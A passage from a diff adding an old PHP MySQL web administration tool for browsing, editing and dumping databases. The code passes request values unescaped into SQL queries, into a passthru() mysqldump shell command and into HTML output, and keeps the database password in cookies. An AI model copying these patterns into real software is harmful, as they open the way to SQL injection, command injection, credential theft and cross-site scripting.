+href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n"; + echo "</td>\n"; + echo "</tr>\n"; + } + + echo "</table>"; +} + +function createTable() { + global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, +$errMsg; + + $queryStr = "CREATE TABLE $tablename ( no INT )"; + mysql_select_db( $dbname, $mysqlHandle ); + mysql_query( $queryStr, $mysqlHandle ); + $errMsg = mysql_error(); + + listTables(); +} + +function dropTable() { + global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, +$errMsg; + + $queryStr = "DROP TABLE $tablename"; + mysql_select_db( $dbname, $mysqlHandle ); + mysql_query( $queryStr, $mysqlHandle ); + $errMsg = mysql_error(); + + listTables(); +} + +function viewSchema() { + global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, +$errMsg; + + echo "<h1>Table Schema</h1>\n"; + echo "<p class=location>$dbname &gt; $tablename</p>\n"; + + echoQueryResult(); + + echo "<a +href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add +Field</a> | \n"; + echo "<a +href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View +Data</a>\n"; + echo "<hr>\n"; + + $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); + $num = mysql_num_rows( $pResult ); + + echo "<table cellspacing=1 cellpadding=5>\n"; + echo "<tr>\n"; + echo "<th>Field</th>\n"; + echo "<th>Type</th>\n"; + echo "<th>Null</th>\n"; + echo "<th>Key</th>\n"; + echo "<th>Default</th>\n"; + echo "<th>Extra</th>\n"; + echo "<th colspan=2>Action</th>\n"; + echo "</tr>\n"; + + for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_array( $pResult ); + echo "<tr>\n"; + echo "<td>".$field["Field"]."</td>\n"; + echo "<td>".$field["Type"]."</td>\n"; + echo "<td>".$field["Null"]."</td>\n"; + echo "<td>".$field["Key"]."</td>\n"; + echo "<td>".$field["Default"]."</td>\n"; + echo "<td>".$field["Extra"]."</td>\n"; + $fieldname = $field["Field"]; + echo "<td><a +href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n"; + echo "<td><a +href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' +onClick=\"return confirm('Drop Field +\'$fieldname\'?')\">Drop</a></td>\n"; + echo "</tr>\n"; + } + echo "</table>\n"; +} + +function manageField( $cmd ) { + global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF; + + if( $cmd == "add" ) + echo "<h1>Add Field</h1>\n"; + else if( $cmd == "edit" ) { + echo "<h1>Edit Field</h1>\n"; + $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); + $num = mysql_num_rows( $pResult ); + for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_array( $pResult ); + if( $field["Field"] == $fieldname ) { + $fieldtype = $field["Type"]; + $fieldkey = $field["Key"]; + $fieldextra = $field["Extra"]; + $fieldnull = $field["Null"]; + $fielddefault = $field["Default"]; + break; + } + } + $type = strtok( $fieldtype, " (,)\n" ); + if( strpos( $fieldtype, "(" ) ) { + if( $type == "enum" | $type == "set" ) { + $valuelist = strtok( " ()\n" ); + } else { + $M = strtok( " (,)\n" ); + if( strpos( $fieldtype, "," ) ) + $D = strtok( " (,)\n" ); + } + } + } + + echo "<p class=location>$dbname &gt; $tablename</p>\n"; + echo "<form action=$PHP_SELF>\n"; + + if( $cmd == "add" ) + echo "<input type=hidden name=action value=addField_submit>\n"; + else if( $cmd == "edit" ) { + echo "<input type=hidden name=action value=editField_submit>\n"; + echo "<input type=hidden name=old_name value=$fieldname>\n"; + } + echo "<input type=hidden name=dbname value=$dbname>\n"; + echo "<input type=hidden name=tablename value=$tablename>\n"; + + echo "<h3>Name</h3>\n"; + echo "<input type=text name=name value=$fieldname><p>\n"; +?> + +<h3>Type</h3> + +<font size=2> +* `M' indicates the maximum display size.<br> +* `D' applies to floating-point types and indicates the number of +digits +following the decimal point.<br> +</font> + +<table> +<tr> +<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th> +</tr> +<tr> +<td><input type=radio name=type value="TINYINT" <? if( $type == +"tinyint" ) +echo "checked";?>>TINYINT (-128 ~ 127)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="SMALLINT" <? if( $type == +"smallint" +) echo "checked";?>>SMALLINT (-32768 ~ 32767)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="MEDIUMINT" <? if( $type == +"mediumint" ) echo "checked";?>>MEDIUMINT (-8388608 ~ 8388607)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="INT" <? if( $type == "int" ) +echo +"checked";?>>INT (-2147483648 ~ 2147483647)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" +) +echo "checked";?>>BIGINT (-9223372036854775808 ~ +9223372036854775807)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="FLOAT" <? if( $type == "float" ) +echo +"checked";?>>FLOAT</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="DOUBLE" <? if( $type == "double" +) +echo "checked";?>>DOUBLE</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="DECIMAL" <? if( $type == +"decimal" ) +echo "checked";?>>DECIMAL(NUMERIC)</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="DATE" <? if( $type == "date" ) +echo +"checked";?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="DATETIME" <? if( $type == +"datetime" +) echo "checked";?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 +23:59:59, +YYYY-MM-DD HH:MM:SS)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="TIMESTAMP" <? if( $type == +"timestamp" ) echo "checked";?>>TIMESTAMP (1970-01-01 00:00:00 ~ +2106..., +YYYYMMDD[HH[MM[SS]]])</td> +<td align=center>O</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="TIME" <? if( $type == "time" ) +echo +"checked";?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) +echo +"checked";?>>YEAR (1901 ~ 2155, 0000, YYYY)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) +echo +"checked";?>>CHAR</td> +<td align=center>O</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td align=center>O</td> +</tr> +<tr> +<td><input type=radio name=type value="VARCHAR" <? if( $type == +"varchar" ) +echo "checked";?>>VARCHAR</td> +<td align=center>O</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td align=center>O</td> +</tr> +<tr> +<td><input type=radio name=type value="TINYTEXT" <? if( $type == +"tinytext" +) echo "checked";?>>TINYTEXT (0 ~ 255)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) +echo +"checked";?>>TEXT (0 ~ 65535)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="MEDIUMTEXT" <? if( $type == +"mediumtext" ) echo "checked";?>>MEDIUMTEXT (0 ~ 16777215)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="LONGTEXT" <? if( $type == +"longtext" +) echo "checked";?>>LONGTEXT (0 ~ 4294967295)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="TINYBLOB" <? if( $type == +"tinyblob" +) echo "checked";?>>TINYBLOB (0 ~ 255)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) +echo +"checked";?>>BLOB (0 ~ 65535)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="MEDIUMBLOB" <? if( $type == +"mediumblob" ) echo "checked";?>>MEDIUMBLOB (0 ~ 16777215)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="LONGBLOB" <? if( $type == +"longblob" +) echo "checked";?>>LONGBLOB (0 ~ 4294967295)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="ENUM" <? if( $type == "enum" ) +echo +"checked";?>>ENUM</td> +<td colspan=5><center>value list</center></td> +</tr> +<tr> +<td><input type=radio name=type value="SET" <? if( $type == "set" ) +echo +"checked";?>>SET</td> +<td colspan=5><center>value list</center></td> +</tr> + +</table> +<table> +<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value +list (ex: 'apple', 'orange', 'banana') </th></tr> +<tr> +<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo +"value=$M";?>></td> +<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo +"value=$D";?>></td> +<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? +if( +strpos( $fieldtype, "unsigned" ) ) echo "checked";?>></td> +<td align=center><input type=checkbox name=zerofill value="ZEROFILL" <? +if( +strpos( $fieldtype, "zerofill" ) ) echo "checked";?>></td> +<td align=center><input type=checkbox name=binary value="BINARY" <? if( +strpos( $fieldtype, "binary" ) ) echo "checked";?>></td> +<td align=center><input type=text size=60 name=valuelist <? if( +$valuelist +!= "" ) echo "value=\"$valuelist\"";?>></td> +</tr> +</table> + + +<h3>Flags</h3> +<table> +<tr><th>not null</th><th>default value</th><th>auto +increment</th><th>primary key</th></tr> +<tr> +<td align=center><input type=checkbox name=not_null value="NOT NULL" <? +if( +$fieldnull != "YES" ) echo "checked";?>></td> +<td align=center><input type=text name=default_value <? if( +$fielddefault != +"" ) echo "value=$fielddefault";?>></td> +<td align=center><input type=checkbox name=auto_increment +value="AUTO_INCREMENT" <? if( $fieldextra == "auto_increment" ) echo +"checked";?>></td> +<td align=center><input type=checkbox name=primary_key value="PRIMARY +KEY" +<? if( $fieldkey == "PRI" ) echo "checked";?>></td> +</tr> +</table> + +<p> + +<? + if( $cmd == "add" ) + echo "<input type=submit value='Add Field'>\n"; + else if( $cmd == "edit" ) + echo "<input type=submit value='Edit Field'>\n"; + echo "<input type=button value=Cancel onClick='history.back()'>\n"; + echo "</form>\n"; +} + +function manageField_submit( $cmd ) { + global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, +$PHP_SELF, $queryStr, $errMsg, + $M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, +$auto_increment, $primary_key, $valuelist; + + if( $cmd == "add" ) + $queryStr = "ALTER TABLE $tablename ADD $name "; + else if( $cmd == "edit" ) + $queryStr = "ALTER TABLE $tablename CHANGE $old_name $name "; + + if( $M != "" ) + if( $D != "" ) + $queryStr .= "$type($M,$D) "; + else + $queryStr .= "$type($M) "; + else if( $valuelist != "" ) { + $valuelist = stripslashes( $valuelist ); + $queryStr .= "$type($valuelist) "; + } else + $queryStr .= "$type "; + + $queryStr .= "$unsigned $zerofill $binary "; + + if( $default_value != "" ) + $queryStr .= "DEFAULT '$default_value' "; + + $queryStr .= "$not_null $auto_increment"; + + mysql_select_db( $dbname, $mysqlHandle ); + mysql_query( $queryStr, $mysqlHandle ); + $errMsg = mysql_error(); + + // key change + $keyChange = false; + $result = mysql_query( "SHOW KEYS FROM $tablename" ); + $primary = ""; + while( $row = mysql_fetch_array($result) ) + if( $row["Key_name"] == "PRIMARY" ) { + if( $row[Column_name] == $name ) + $keyChange = true; + else + $primary .= ", $row[Column_name]"; + } + if( $primary_key == "PRIMARY KEY" ) { + $primary .= ", $name"; + $keyChange = !$keyChange; + } + $primary = substr( $primary, 2 ); + if( $keyChange == true ) { + $q = "ALTER TABLE $tablename DROP PRIMARY KEY"; + mysql_query( $q ); + $queryStr .= "<br>\n" . $q; + $errMsg .= "<br>\n" . mysql_error(); + $q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )"; + mysql_query( $q ); + $queryStr .= "<br>\n" . $q; + $errMsg .= "<br>\n" . mysql_error(); + } + + viewSchema(); +} + +function dropField() { + global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, +$queryStr, +$errMsg; + + $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname"; + mysql_select_db( $dbname, $mysqlHandle ); + mysql_query( $queryStr , $mysqlHandle ); + $errMsg = mysql_error(); + + viewSchema(); +} + +function viewData( $queryStr ) { + global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, +$rowperpage, $orderby; + + echo "<h1>Data in Table</h1>\n"; + if( $tablename != "" ) + echo "<p class=location>$dbname &gt; $tablename</p>\n"; + else + echo "<p class=location>$dbname</p>\n"; + + $queryStr = stripslashes( $queryStr ); + if( $queryStr == "" ) { + $queryStr = "SELECT * FROM $tablename"; + if( $orderby != "" ) + $queryStr .= " ORDER BY $orderby"; + echo "<a +href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add +Data</a> | \n"; + echo "<a +href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n"; + } + + $pResult = mysql_db_query( $dbname, $queryStr ); + $errMsg = mysql_error(); + + $GLOBALS[queryStr] = $queryStr; + + if( $pResult == false ) { + echoQueryResult(); + return; + } + if( $pResult == 1 ) { + $errMsg = "Success"; + echoQueryResult(); + return; + } + + echo "<hr>\n"; + + $row = mysql_num_rows( $pResult ); + $col = mysql_num_fields( $pResult ); + + if( $row == 0 ) { + echo "No Data Exist!"; + return; + } + + if( $rowperpage == "" ) $rowperpage = 20; + if( $page == "" ) $page = 0; + else $page--; + mysql_data_seek( $pResult, $page * $rowperpage ); + + echo "<table cellspacing=1 cellpadding=2>\n"; + echo "<tr>\n"; + for( $i = 0; $i < $col; $i++ ) { + $field = mysql_fetch_field( $pResult, $i ); + echo "<th>"; + echo "<a +href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n"; + echo "</th>\n"; + } + echo "<th colspan=2>Action</th>\n"; + echo "</tr>\n"; + + for( $i = 0; $i < $rowperpage; $i++ ) { + $rowArray = mysql_fetch_row( $pResult ); + if( $rowArray == false ) break; + echo "<tr>\n"; + $key = ""; + for( $j = 0; $j < $col; $j++ ) { + $data = $rowArray[$j]; + + $field = mysql_fetch_field( $pResult, $j ); + if( $field->primary_key == 1 ) + $key .= "&" . $field->name . "=" . $data; + + if( strlen( $data ) > 20 ) + $data = substr( $data, 0, 20 ) . "..."; + $data = htmlspecialchars( $data ); + echo "<td>\n"; + echo "$data\n"; + echo "</td>\n"; + } + + if( $key == "" ) + echo "<td colspan=2>no Key</td>\n"; + else { + echo "<td><a +href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n"; + echo "<td><a +href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key' +onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n"; + } + echo "</tr>\n"; + } + echo "</table>\n"; + + echo "<font size=2>\n"; + echo "<form +action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' +method=post>\n"; + echo "<font color=green>\n"; + echo ($page+1)."/".(int)($row/$rowperpage+1)." page"; + echo "</font>\n"; + echo " | "; + if( $page > 0 ) { + echo "<a +href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page); + if( $orderby != "" ) + echo "&orderby=$orderby"; + echo "'>Prev</a>\n"; + } else + echo "Prev"; + echo " | "; + if( $page < ($row/$rowperpage)-1 ) { + echo "<a +href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2); + if( $orderby != "" ) + echo "&orderby=$orderby"; + echo "'>Next</a>\n"; + } else + echo "Next"; + echo " | "; + if( $row > $rowperpage ) { + echo "<input type=text size=4 name=page>\n"; + echo "<input type=submit value='Go'>\n"; + } + echo "</form>\n"; + echo "</font>\n"; +} + +function manageData( $cmd ) { + global $mysqlHandle, $dbname, $tablename, $PHP_SELF; + + if( $cmd == "add" ) + echo "<h1>Add Data</h1>\n"; + else if( $cmd == "edit" ) { + echo "<h1>Edit Data</h1>\n"; + $pResult = mysql_list_fields( $dbname, $tablename ); + $num = mysql_num_fields( $pResult ); + + $key = ""; + for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_field( $pResult, $i ); + if( $field->primary_key == 1 ) + if( $field->numeric == 1 ) + $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND "; + else + $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND "; + } + $key = substr( $key, 0, strlen($key)-4 ); + + mysql_select_db( $dbname, $mysqlHandle ); + $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE +$key", $mysqlHandle ); + $data = mysql_fetch_array( $pResult ); + } + + echo "<p class=location>$dbname &gt; $tablename</p>\n"; + + echo "<form action='$PHP_SELF' method=post>\n"; + if( $cmd == "add" ) + echo "<input type=hidden name=action value=addData_submit>\n"; + else if( $cmd == "edit" ) + echo "<input type=hidden name=action value=editData_submit>\n"; + echo "<input type=hidden name=dbname value=$dbname>\n"; + echo "<input type=hidden name=tablename value=$tablename>\n"; + echo "<table cellspacing=1 cellpadding=2>\n"; + echo "<tr>\n"; + echo "<th>Name</th>\n"; + echo "<th>Type</th>\n"; + echo "<th>Function</th>\n"; + echo "<th>Data</th>\n"; + echo "</tr>\n"; + + $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); + $num = mysql_num_rows( $pResult ); + + $pResultLen = mysql_list_fields( $dbname, $tablename ); + + for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_array( $pResult ); + $fieldname = $field["Field"]; + $fieldtype = $field["Type"]; + $len = mysql_field_len( $pResultLen, $i ); + + echo "<tr>"; + echo "<td>$fieldname</td>"; + echo "<td>".$field["Type"]."</td>"; + echo "<td>\n"; + echo "<select name=${fieldname}_function>\n"; + echo "<option>\n"; + echo "<option>ASCII\n"; + echo "<option>CHAR\n"; + echo "<option>SOUNDEX\n"; + echo "<option>CURDATE\n"; + echo "<option>CURTIME\n"; + echo "<option>FROM_DAYS\n"; + echo "<option>FROM_UNIXTIME\n"; + echo "<option>NOW\n"; + echo "<option>PASSWORD\n"; + echo "<option>PERIOD_ADD\n"; + echo "<option>PERIOD_DIFF\n"; + echo "<option>TO_DAYS\n"; + echo "<option>USER\n"; + echo "<option>WEEKDAY\n"; + echo "<option>RAND\n"; + echo "</select>\n"; + echo "</td>\n"; + $value = htmlspecialchars($data[$i]); + if( $cmd == "add" ) { + $type = strtok( $fieldtype, " (,)\n" ); + if( $type == "enum" || $type == "set" ) { + echo "<td>\n"; + if( $type == "enum" ) + echo "<select name=$fieldname>\n"; + else if( $type == "set" ) + echo "<select name=$fieldname size=4 multiple>\n"; + echo strtok( "'" ); + while( $str = strtok( "'" ) ) { + echo "<option>$str\n"; + strtok( "'" ); + } + echo "</select>\n"; + echo "</td>\n"; + } else { + if( $len < 40 ) + echo "<td><input type=text size=40 maxlength=$len +name=$fieldname></td>\n"; + else + echo "<td><textarea cols=40 rows=3 maxlength=$len +name=$fieldname></textarea>\n"; + } + } else if( $cmd == "edit" ) { + $type = strtok( $fieldtype, " (,)\n" ); + if( $type == "enum" || $type == "set" ) { + echo "<td>\n"; + if( $type == "enum" ) + echo "<select name=$fieldname>\n"; + else if( $type == "set" ) + echo "<select name=$fieldname size=4 multiple>\n"; + echo strtok( "'" ); + while( $str = strtok( "'" ) ) { + if( $value == $str ) + echo "<option selected>$str\n"; + else + echo "<option>$str\n"; + strtok( "'" ); + } + echo "</select>\n"; + echo "</td>\n"; + } else { + if( $len < 40 ) + echo "<td><input type=text size=40 maxlength=$len name=$fieldname +value=\"$value\"></td>\n"; + else + echo "<td><textarea cols=40 rows=3 maxlength=$len +name=$fieldname>$value</textarea>\n"; + } + } + echo "</tr>"; + } + echo "</table><p>\n"; + if( $cmd == "add" ) + echo "<input type=submit value='Add Data'>\n"; + else if( $cmd == "edit" ) + echo "<input type=submit value='Edit Data'>\n"; + echo "<input type=button value='Cancel' onClick='history.back()'>\n"; + echo "</form>\n"; +} + +function manageData_submit( $cmd ) { + global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, +$queryStr, +$errMsg; + + $pResult = mysql_list_fields( $dbname, $tablename ); + $num = mysql_num_fields( $pResult ); + + mysql_select_db( $dbname, $mysqlHandle ); + if( $cmd == "add" ) + $queryStr = "INSERT INTO $tablename VALUES ("; + else if( $cmd == "edit" ) + $queryStr = "REPLACE INTO $tablename VALUES ("; + for( $i = 0; $i < $num-1; $i++ ) { + $field = mysql_fetch_field( $pResult ); + $func = $GLOBALS[$field->name."_function"]; + if( $func != "" ) + $queryStr .= " $func("; + if( $field->numeric == 1 ) { + $queryStr .= $GLOBALS[$field->name]; + if( $func != "" ) + $queryStr .= "),"; + else + $queryStr .= ","; + } else { + $queryStr .= "'" . $GLOBALS[$field->name]; + if( $func != "" ) + $queryStr .= "'),"; + else + $queryStr .= "',"; + } + } + $field = mysql_fetch_field( $pResult ); + if( $field->numeric == 1 ) + $queryStr .= $GLOBALS[$field->name] . ")"; + else + $queryStr .= "'" . $GLOBALS[$field->name] . "')"; + + mysql_query( $queryStr , $mysqlHandle ); + $errMsg = mysql_error(); + + viewData( "" ); +} + +function deleteData() { + global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, +$queryStr, +$errMsg; + + $pResult = mysql_list_fields( $dbname, $tablename ); + $num = mysql_num_fields( $pResult ); + + $key = ""; + for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_field( $pResult, $i ); + if( $field->primary_key == 1 ) + if( $field->numeric == 1 ) + $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND "; + else + $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND "; + } + $key = substr( $key, 0, strlen($key)-4 ); + + mysql_select_db( $dbname, $mysqlHandle ); + $queryStr = "DELETE FROM $tablename WHERE $key"; + mysql_query( $queryStr, $mysqlHandle ); + $errMsg = mysql_error(); + + viewData( "" ); +} + +function dump() { + global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename; + + if( $action == "dumpTable" ) + $filename = $tablename; + else + $filename = $dbname; + + header("Content-disposition: filename=$filename.sql"); + header("Content-type: application/octetstream"); + header("Pragma: no-cache"); + header("Expires: 0"); + + $pResult = mysql_query( "show variables" ); + while( 1 ) { + $rowArray = mysql_fetch_row( $pResult ); + if( $rowArray == false ) break; + if( $rowArray[0] == "basedir" ) + $bindir = $rowArray[1]."bin/"; + } + + passthru( $bindir."mysqldump --user=$USERNAME --password=$PASSWORD +$dbname +$tablename" ); +} + +function utils() { + global $PHP_SELF, $command; + echo "<h1>Utilities</h1>\n"; + if( $command == "" || substr( $command, 0, 5 ) == "flush" ) { + echo "<hr>\n"; + echo "Show\n"; + echo "<ul>\n"; + echo "<li><a +href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n"; + echo "<li><a +href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n"; + echo "<li><a +href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n"; + echo "</ul>\n"; + echo "Flush\n"; + echo "<ul>\n"; + echo "<li><a +href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n"; + if( $command == "flush_hosts" ) { + if( mysql_query( "Flush hosts" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "<li><a +href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n"; + if( $command == "flush_logs" ) { + if( mysql_query( "Flush logs" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "<li><a +href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n"; + if( $command == "flush_privileges" ) { + if( mysql_query( "Flush privileges" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "<li><a +href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n"; + if( $command == "flush_tables" ) { + if( mysql_query( "Flush tables" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "<li><a +href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n"; + if( $command == "flush_status" ) { + if( mysql_query( "Flush status" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "</ul>\n"; + } else { + $queryStr = ereg_replace( "_", " ", $command ); + $pResult = mysql_query( $queryStr ); + if( $pResult == false ) { + echo "Fail"; + return; + } + $col = mysql_num_fields( $pResult ); + + echo "<p class=location>$queryStr</p>\n"; + echo "<hr>\n"; + + echo "<table cellspacing=1 cellpadding=2 border=0>\n"; + echo "<tr>\n"; + for( $i = 0; $i < $col; $i++ ) { + $field = mysql_fetch_field( $pResult, $i ); + echo "<th>".$field->name."</th>\n"; + } + echo "</tr>\n"; + + while( 1 ) { + $rowArray = mysql_fetch_row( $pResult ); + if( $rowArray == false ) break; + echo "<tr>\n"; + for( $j = 0; $j < $col; $j++ ) + echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n"; + echo "</tr>\n"; + } + echo "</table>\n"; + } +} + +function header_html() { + global $PHP_SELF; + +?> +<html> +<head> +<title>MySQL Web Interface</title> +<style type="text/css"> +<!-- +p.location { + color: #11bb33; + font-size: small; +} +h1 { + color: #A4A260; +} +th { + background-color: #BDBE42; + color: #FFFFFF; + font-size: x-small; +} +td { + background-color: #DEDFA5; + font-size: x-small; +} +form { + margin-top: 0; + margin-bottom: 0; +} +a { + text-decoration:none; + color: #848200; + font-size:x-small; +} +a:link { +} +a:hover { + background-color:#EEEFD5; + color:#646200; + text-decoration:none +} +//--> +</style> +</head> +<body> +<? +} + +function footer_html() { + global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME; + + echo "<hr>\n"; + echo "<font size=2>\n"; + echo "<font color=blue>[$USERNAME]</font> - \n"; + + echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n"; + if( $tablename != "" ) + echo "<a +href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table +List</a> | "; + echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n"; + echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n"; + echo "</font>\n"; + echo "</body>\n"; + echo "</html>\n"; +} + +//------------------------------------------------------ MAIN + +if( $action == "logon" || $action == "" || $action == "logout" ) + logon(); +else if( $action == "logon_submit" ) + logon_submit(); +else if( $action == "dumpTable" || $action == "dumpDB" ) { + while( list($var, $value) = each($HTTP_COOKIE_VARS) ) { + if( $var == "mysql_web_admin_username" ) $USERNAME = $value; + if( $var == "mysql_web_admin_password" ) $PASSWORD = $value; + } + $mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD ); + dump(); +} else { + while( list($var, $value) = each($HTTP_COOKIE_VARS) ) { + if( $var == "mysql_web_admin_username" ) $USERNAME = $value; + if( $var == "mysql_web_admin_password" ) $PASSWORD = $value; + } + echo "<!--"; + $mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD ); + echo "-->"; + + if( $mysqlHandle == false ) { + echo "<html>\n"; + echo "<head>\n"; + echo "<title>MySQL Web Interface</title>\n"; + echo "</head>\n"; + echo "<body>\n"; + echo "<table width=100% height=100%><tr><td><center>\n"; 